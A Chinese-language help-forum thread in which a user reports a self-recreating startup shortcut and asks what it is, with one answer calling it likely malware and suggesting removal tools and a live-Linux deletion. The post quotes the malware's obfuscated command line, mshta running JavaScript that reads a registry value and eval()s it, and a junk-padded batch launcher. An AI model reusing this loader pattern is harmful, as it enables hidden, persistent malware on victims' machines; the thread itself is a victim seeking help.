启动文件夹中有一个快捷方式,它以此作为运行的命令行。我删除了快捷方式,但它在几秒钟内又重新出现了。重命名它,几秒钟内就会重新出现一个新的快捷方式。
C:\Windows\System32\cmd.exe /C start "" mshta.exe "javascript:P4jMDuRB="Sm3jr6aQ";c40B=new ActiveXObject("WScript.Shell");QS2K8wl="cDy";nv5R4S=c40B.RegRead("HKCU\\software\\voxpbs\\semhdvkm");g2McQ8A="Ns6iJl";eval(nv5R4S);JldeI3="1UbkKa";"
我还在 users\me\local 文件夹中找到了一个批处理文件。它运行的命令是:
echo J9pmT5Q
echo B0NWNWENzjH21WwgEa2kO0
echo 5Wjb2iki6K0a
echo FrG1NkCWmPPz57pvX
echo vxh8uiEY4zed9rLWqlq3INKnP
echo ZJ882016HVGsX28HEC53bkelC
echo x4SZRj8VY37HCvczeQ9
start "QevslvDchtWcI59vUY1" "%LOCALAPPDATA%\9d9b\505f.3f751"
echo rDqX4A1lWPV1YBTn47sCq
echo US6k8ZpwRaBaZ8WjjuIWQoHhqnYhPf3U
echo VHu5IVd8Y0oGQx0qB0UJaQhjf
echo Q98kbBFD2PgR
echo uEyyzwkL88oeKhG1d3U3ds
echo lpM0oIMjeZ2IA5w9GGWaXzhx3PGmfoO
echo YJrUdLTH
我看到它在计算机启动时运行。它由名为“d178”的快捷方式调用。我在启动过程中短暂地看到了命令窗口。我扫描了文件“505f.3f751”,到目前为止没有发现任何感染。
如果有人知道这些是什么,那就太好了。我还没有尝试启动安全模式来看看会发生什么。我可能很快就会尝试。
答案1
这很可能是某种恶意软件、广告软件或其他 PUP。
因此,我们应该尝试将其删除。我看到您尝试使用 regedit 将其删除。我建议您尝试 AdwCleaner,正如所建议的那样,Malwarebytes。
如果你仍然无法删除它,那么这个程序可能正在运行,并在检测到它被删除时将其复制回来。因此,我建议我们尝试在操作系统外部删除它。下载任何实时 Linux 发行版,例如这个以及一个名为鲁弗斯。使用 Rufus 将 ISO 放入闪存驱动器。启动闪存驱动器并尝试删除该文件。希望当您重新启动时,它会消失。